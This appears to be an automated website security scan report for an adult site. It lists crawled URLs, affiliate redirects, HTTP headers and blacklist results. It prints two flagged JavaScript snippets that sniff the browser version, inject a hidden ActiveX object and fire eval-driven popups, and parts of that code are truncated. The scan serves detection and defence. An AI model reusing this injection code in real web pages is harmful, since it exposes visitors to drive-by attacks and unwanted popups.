Scanned pages/files
| Request | Server response | Status |
http://whorekingdom.com/ | 200 OK Content-Length: 32399 Content-Type: text/html | clean |
http://www.sexventura.com/lotpop.js | 200 OK Content-Length: 1439 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; function ext() { if(exit) { exit=false; if(!isXPSP2 && !usePopDialog) { window.open(popURL,"",popWindowOptions); } else if(!isXPSP2 && usePopDialog) { eval("window function brs() { document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; } function ver() { isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2) brs(); } var popURL = 'http://www.sexventura.com/lotpop.html'; isUsingSpecial = true; eval("window.attachEvent('onload',ver);"); eval("window.attachEvent('onunload',ext);"); Antivirus reports:
| ||
http://whorekingdom.com/%20%09http://milflessons.bangbros1.com/pictures-rand/?PPS=zaglebie/ | 404 Not Found Content-Length: 366 Content-Type: text/html | clean |
http://whorekingdom.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://whorekingdom.com/linki/cfnmzone.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 03:08:32 GMT Location: http://ww2.hardcorepartying.com/track/NjU4Mzo1OjEw/ Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ww2.hardcorepartying.com/track/nju4mzo1ojew/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://whorekingdom.com/linki/asianbeaver.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 03:08:38 GMT Location: http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=926149-0000&PA=951443&HTML=http://www.asiaorgasm.com Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | clean |
http://refer.ccbill.com/cgi-bin/clicks.cgi?ca=926149-0000&pa=951443&html=http://www.asiaorgasm.com | HTTP/1.1 302 Found Date: Thu, 25 Dec 2014 03:08:41 GMT Location: http://www.asiaorgasm.com Server: Apache Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 926149=CLICKS2zxeBFFYicJS1; expires=Saturday 27-Dec-14 20:08:41 GMT; path=/; domain=.ccbill.com X-Cnection: close | clean |
http://www.asiaorgasm.com/ | 200 OK Content-Length: 32681 Content-Type: text/html | clean |
http://www.asiaorgasm.com/sample-lonni.wmv | 200 OK Content-Length: 300670 Content-Type: video/x-ms-wmv | clean |
http://whorekingdom.com/linki/sample-lonni.wmv | 404 Not Found Content-Length: 339 Content-Type: text/html | clean |
http://whorekingdom.com/linki/join.html | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://whorekingdom.com/linki/member/ | 404 Not Found Content-Length: 330 Content-Type: text/html | clean |
http://whorekingdom.com/linki/2257.html | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://whorekingdom.com/links.htm | 404 Not Found Content-Length: 326 Content-Type: text/html | clean |
http://whorekingdom.com/black/hornylatina/hornylatina.html | 200 OK Content-Length: 9080 Content-Type: text/html | clean |
http://www.whorekingdom.com/pop/blackpop.js | 200 OK Content-Length: 1447 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; function ext() { if(exit) { exit=false; if(!isXPSP2 && !usePopDialog) { window.open(popURL,"",popWindowOptions); } else if(!isXPSP2 && usePopDialog) { eval("window function brs() { document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; } function ver() { isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2) brs(); } var popURL = 'http://www.whorekingdom.com/pop/blackpop.html'; isUsingSpecial = true; eval("window.attachEvent('onload',ver);"); eval("window.attachEvent('onunload',ext);"); Antivirus reports:
| ||
http://whorekingdom.com/black/hornylatina/../../linki/pimpmyteen.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 03:08:42 GMT Location: http://www.pimpmyblackteen.com/?wm_login=zaglebie Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pimpmyblackteen.com/?wm_login=zaglebie | HTTP/1.1 301 Moved Permanently Date: Thu, 25 Dec 2014 02:54:09 GMT Location: http://www.pimpmyblackteen.com/tour3/?wm_login=zaglebie Server: Zeus/4.3 Content-Type: text/html X-Powered-By: PHP/4.4.1 | clean |
http://www.pimpmyblackteen.com/tour3/?wm_login=zaglebie | 200 OK Content-Length: 8663 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: whorekingdom.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 03:08:30 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: whorekingdom.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 03:08:30 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: whorekingdom.com
Referer: http://www.google.com/search?q=whorekingdom.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: whorekingdom.com
Referer: http://www.google.com/search?q=whorekingdom.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=whorekingdom.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://whorekingdom.com/
Result: whorekingdom.com is not infected or malware details are not published yet.
Result: whorekingdom.com is not infected or malware details are not published yet.